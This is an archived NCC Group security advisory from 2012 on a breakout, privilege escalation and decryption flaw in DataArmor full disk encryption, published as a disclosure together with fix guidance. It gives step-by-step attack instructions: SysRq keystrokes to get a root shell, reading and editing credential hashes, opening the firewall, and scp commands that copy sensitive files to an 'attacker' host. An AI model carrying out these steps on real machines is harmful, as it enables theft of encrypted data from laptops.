[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NGS000193 Technical Advisory: DataArmor Full Disk Encryption Restricted Environment breakout

=======
Summary
=======
Name: DataArmor Full Disk Encryption - Restricted Environment breakout, 
Privilege Escalation and Full Disk Decryption
Release Date: 30 November 2012
Reference: NGS00193
Discoverer: Stuart Passe <stuart.passe@xxxxxxxxxxxxx>
Vendor: Mobile Armor
Vendor Reference: KB #1060043
Systems Affected: All versions of DataArmor and DriveArmor prior to v3.0.12.861 
Risk: Critical
Status: Published

========
TimeLine
========
Discovered: 10 January 2012
Released: 17 January 2012
Approved: 17 January 2012
Reported: 17 January 2012
Fixed: 23 January 2012
Published: 30 November 2012

===========
Description
===========
The Mobile Armor DataArmor Full Disk Encryption platform allows users to fully 
encrypt hard drives utilising centralised security policy management.

An issue exists whereby it is possible for unauthenticated users to break out 
from the restricted DataArmor environment, providing unrestricted 
administrative access to the underlying platform and associated configuration 
files.

This allows users to arbitrarily modify both the platform and associated 
configuration files. Authentication credentials can then be added and/or 
generated, providing the ability to escalate privileges and gain full access to 
data stored on the encrypted partition.

=================
Technical Details
=================
The DataArmor software appears to be running under a restricted Linux X11 
environment, configured to grab all keystrokes so that special key combinations 
which might normally be accepted by a Linux Kernel (such as "reboot" 
[Ctrl+Alt+Del] or "switch TTY" [Ctrl+Alt+{F1-F12}]) are discarded and not acted 
upon by the underlying Operating System.

It is possible to bypass this keystroke grabbing (through use of the SysRq 
key), providing the ability to send special commands directly to the Linux 
Kernel and break-out from the DataArmor environment into the underlying Linux 
BusyBox Operating System. This subsequently exposes the running DataArmor 
environment to full manipulation by any user with physical access to the 
machine, with the possibility of recovering files or fully decrypting the hard 
disk by unauthorised users.

Technical Details (Proof of Concept)
====================================

Restricted Environment Breakout
-------------------------------
Note: The "SysRq" key is usually located near the "Print Screen" key. On some 
laptops "SysRq" is accessible only by pressing "Fn". In this case the 
combination is a bit trickier:  hold "Alt", hold "Fn", hold "SysRq", release 
"Fn", press key.

1.      Power on laptop and allow DataArmor software to present authentication 
screen
2.      Send the SIGTERM signal to all processes except init (Alt+SysRq+e), 
which results in a blank screen being displayed 
3.      Switch to TTY2 (Ctrl+Alt+F2), which will display a cursor 
4.      Send the SIGKILL signal to all processes except init (Alt+SysRq+i), 
which will display the following prompt 
5.      Press "Return" to activate shell as root
6.      Verify that shell is obtained 
7.      Open an additional TTY (Ctrl+Alt+F3) and press "Return"
8.      Verify that the DataArmor "MAAuthenticate" software is not running (ps) 
9.      Switch back to TTY2 (Ctrl+Alt+F2)
10.     Reinitialise the X11 environment (startx)
11.     Allow the DataArmor software to fully load
12.     Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to 
disconnect keyboard from X11 keystroke grabbing
13.     Switch back to the additional TTY3 (Ctrl+Alt+F3)
14.     Check in the process list that DataArmor is fully running (ps)  

At this stage, it is possible to manipulate the DataArmor environment into 
performing how we wish, allowing for potential full compromise of the laptop 
and encrypted data. We can view all current local users and hashes (cat 
/etc/Source/MAData.xml) for offline password-cracking as well as view and 
modify the local security policy (cat /etc/Source/PolicyFile.xml). This can 
however be taken a stage further. In addition to viewing the contents of these 
files, the DataArmor software re-reads the contents of the files when an 
authentication attempt is made, allowing a user to modify the files within the 
XFS /etc partition and have the software act accordingly (this can be useful 
for acts such as modifying the policy to prevent data erase and lockouts after 
failed password attempts, or change authentication method to local file 
containing hashes). The following can be performed after step 13 above, with 
the DataArmor software fully running.

Add User or Escalate Privileges
-------------------------------
Note: Whilst the privilege escalation vulnerability has been proven 
successfully within the test environment, the ability to successfully add users 
isn't fully tested at this stage due to uncertainties as to the
method of hash generation. This is purely a time restriction limitation due to 
short-term access to a DataArmor-enabled laptop, and could be successfully 
overcome with more time to complete reverse engineering efforts.

1.      Navigate to the directory containing configuration files (cd 
/etc/Source)
2.      Open the users file for editing (vi MAData.xml) 
3.      Add new user and associated hashes to file, making sure to write file 
(:wq)
4.      Alternatively if credentials are known for a standard 
non-administrative user, edit the file and change the UserType to "1" to 
escalate privileges to an Administrator (<UserType>1</UserType>)
5.      Return to the DataArmor screen running on TTY1 (Ctrl+Alt+F1)
6.      Enter new/modified credentials into authentication box
7.      Successful authentication presents the user with an additional option 
to access the Recovery Console (an administrative function)
8.      This console gives the user free access to administrative functionality 
9.      This subsequently allows the user to recover sensitive files from the 
encrypted partition (such as Windows SAM files and user documents) and transfer 
them  to external media such as a USB stick
10.     Alternatively the user can fully decrypt the hard disk, at which point 
standard techniques for extracting data from the hard disk are applicable 

Import/Export DataArmor Environment
-----------------------------------
Alongside fully compromising the running system through modification, the 
built-in networking capabilities within the Linux BusyBox Operating System mean 
that all platform files can potentially be moved from the local install to a 
secondary machine, or vice versa. This allows not only the possibility of 
extracting the sensitive files for analysis (and potentially cracking) offline 
in order to gain access to the laptop with existing user credentials, but the 
ability to transfer files back means that important libraries and executables 
may be modified on an attacker's machine and then uploaded to the "victim" 
laptop, potentially fully bypassing the encryption altogether or causing 
further malicious actions such as logging keystrokes and sending them via 
network to the attacker in order to capture valid credentials.

1.      Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to 
disconnect keyboard from X11 keystroke grabbing
2.      Switch back to the additional TTY3 (Ctrl+Alt+F3)
3.      Verify the currently running iptables ruleset (iptables -L) 
4.      Change the default rules from "DROP" to "ACCEPT" to allow full network 
access (vi /etc/iptables.conf) 
5.      Load modified iptables ruleset (iptables-restore < /etc/iptables.conf)
6.      The presence of ssh and scp within the DataArmor environment allows for 
transferring files either from the victim (scp /etc/Source/sensitive_files 
attacker@xxxxxxxxxxx:/tmp/) or to the victim machine (scp 
attacker@xxxxxxxxxxx:/tmp/modified_files /etc/Source/) 

===============
Fix Information
===============
An updated version of the software has been released to address these 
vulnerabilities:
http://esupport.trendmicro.com/solution/en-us/1060043.aspx


It is possible to change the configuration parameters whilst the kernel is 
running by either setting a sysctl parameter (kernel.sysrq = 0) or disabling 
directly through the /proc filesystem (echo "0" > /proc/sys/kernel/sysrq), 
however there is a short period of time where the kernel is still vulnerable 
during the booting process, before the contents of the configuration files are 
applied.

Due to this small window of vulnerability, the preferred option is to 
re-compile the Linux Kernel. The SysRq key combination is compiled in to most 
modern Linux Kernels by default, and to disable this fully, it must be 
explicitly specified during compilation of the Linux Kernel by modifying the 
required option (CONFIG_MAGIC_SYSRQ).

Additionally, consideration should be taken to strip down the Linux BusyBox 
environment in order to remove any potentially unnecessary functionality such 
as the shell and associated administrative tools (sh, bash, strace, ssh, scp, 
etc...).

Wikipedia "Magic SysRq Key" - http://en.wikipedia.org/wiki/Magic_SysRq_key
Linux Kernel Documentation - http://kernel.org/doc/Documentation/sysrq.txt
The Linux Documentation Project - 
http://tldp.org/HOWTO/Remote-Serial-Console-HOWTO/security-sysrq.html

NCC Group Research
http://www.nccgroup.com/research


For more information please visit <a 
href="http://www.mimecast.com";>http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>